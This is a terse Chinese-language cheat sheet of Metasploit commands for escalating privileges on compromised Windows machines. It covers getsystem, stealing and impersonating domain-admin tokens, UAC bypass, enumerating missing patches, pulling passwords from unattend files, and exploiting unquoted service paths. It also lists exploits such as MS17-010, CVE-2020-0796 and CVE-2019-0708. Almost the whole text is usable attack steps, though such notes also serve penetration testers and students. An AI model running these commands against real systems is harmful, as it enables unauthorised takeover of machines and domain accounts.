1.getsystem
2.令牌假冒
(1)ps列出系统存在的进程,找到域管理员进程
(2)steal_token 进程号 盗取令牌
查看可以盗取的令牌
(1)use incognito
(2)list_tokens -u
(3)impersonate_token (盗用令牌的账号名)
3.bypassuac+getsystem
4.寻找补丁提权
run post/windows/gather/enum_patches
5.寻找配置文件中得密码账号
post/windows/gather/enum_unattend
6.服务路径
use exploit/windows/local/trusted_service_path
7.注册键提权
Msf搜索提权模块 multi/recon/local_exploit_suggester
ms16075 Windows 2012 smb服务器提权 土豆哥
cve_2020_0796 Windows 10 永恒之黑
ms-17010 Windows 7 windows 2008
Cve- 2019-0708 蓝屏